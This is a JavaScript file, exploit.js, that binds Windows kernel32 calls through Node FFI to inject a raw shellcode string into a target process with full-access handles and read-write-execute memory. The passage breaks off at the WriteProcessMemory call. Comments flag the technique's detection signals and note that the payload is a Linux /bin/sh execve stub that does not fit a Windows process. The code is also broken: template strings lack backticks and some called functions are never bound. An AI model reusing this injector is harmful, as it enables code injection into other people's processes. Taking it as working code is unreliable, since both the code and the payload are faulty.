exploit.js
// Node FFI setup for the injector below. `ffi` and `ref` are third-party
// native-binding packages, not part of the standard library.
const ffi = require("ffi");
const ref = require("ref");
// Pointer types used for the out-parameters of the bound Win32 calls.
const intPtr = ref.refType("int");
// Declared here but not referenced anywhere in the visible lines.
const bytePtr = ref.refType("byte");
// kernel32 entry points: process handle acquisition, module/function lookup,
// remote allocation and remote memory read/write. The OpenProcess ->
// VirtualAllocEx -> WriteProcessMemory sequence is the classic cross-process
// injection chain that host telemetry (ETW/EDR) is commonly tuned to flag.
// NOTE(review): handles and addresses are declared as "uint32" throughout;
// presumably a 32-bit-only assumption — confirm against the intended target.
const kernel32 = ffi.Library("kernel32.dll", {
"OpenProcess": ["pointer", ["uint32", "bool", "uint32"]],
"GetModuleHandleA": ["uint32", ["string"]],
"GetProcAddress": ["uint32", ["uint32", "string"]],
"VirtualAllocEx": ["uint32", ["uint32", "uint32", "size_t", "uint32", "uint32"]],
"WriteProcessMemory": ["bool", ["uint32", "uint32", "pointer", "size_t", intPtr]],
"ReadProcessMemory": ["bool", ["uint32", "uint32", "pointer", "size_t", intPtr]],
"VirtualFreeEx": ["bool", ["uint32", "uint32", "size_t", "uint32"]],
});
// ntdll binding for querying process information; not called in the visible lines.
const ntdll = ffi.Library("ntdll.dll", {
"NtQueryInformationProcess": ["uint32", ["uint32", "int", "pointer", "uint32", intPtr]],
});
// Full-access mask requested on the target process handle (see OpenProcess
// below); requesting all rights rather than the minimum needed is itself a
// detection signal and a least-privilege violation.
const PROCESS_ALL_ACCESS = 0x1F0FFF;
// Read/write/execute page protection passed to VirtualAllocEx below. RWX
// allocations in a remote process are a well-known indicator of injection.
const PAGE_EXECUTE_READWRITE = 0x40;
// Allocation flags combined (MEM_COMMIT | MEM_RESERVE) in the VirtualAllocEx call.
const MEM_COMMIT = 0x1000;
const MEM_RESERVE = 0x2000;
// Information class constant for NtQueryInformationProcess; unused in the visible lines.
const ProcessBasicInformation = 0;
// Raw byte payload written into the remote process. NOTE(review): the bytes
// embed the ASCII text "/bin//sh" and end with 0f 05 (x86-64 `syscall`),
// which looks like a Linux execve stub rather than Windows code — as written
// it is not meaningful inside a Windows process. Left exactly as on the page.
const shellcode =
"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05";
function injectShellCode(pid, moduleName, functionSymbol) {
// Open the target process
const hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if (hProcess.isNull()) {
console.log(Failed to open process with PID ${pid} (error: ${kernel32.GetLastError()}));
return false;
}
// Get the base address of the module
const hModule = kernel32.GetModuleHandleA(moduleName);
if (hModule.isNull()) {
console.log(Failed to get the base address of ${moduleName} in the current process (error: ${kernel32.GetLastError()}));
kernel32.CloseHandle(hProcess);
return false;
}
// Get the address of the function
const pFunction = kernel32.GetProcAddress(hModule, functionSymbol);
if (pFunction.isNull()) {
console.log(Failed to get the address of ${functionSymbol} in the current process (error: ${kernel32.GetLastError()}));
kernel32.CloseHandle(hProcess);
return false;
}
// Allocate memory for the shellcode in the target process
const pRemoteShellcode = kernel32.VirtualAllocEx(hProcess, null, shellcode.length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteShellcode.isNull()) {
console.log(Failed to allocate memory for the shellcode in the target process (error: ${kernel32.GetLastError()}));
kernel32.CloseHandle(hProcess);
return false;
}
// Write the shellcode into the allocated memory
const lpNumberOfBytesWritten = ref.alloc("int");
if (!kernel32.WriteProcessMemory(hProcess, pRemoteShellcode, shellcode, shellcode.length, lpNumberOfBytesWritten))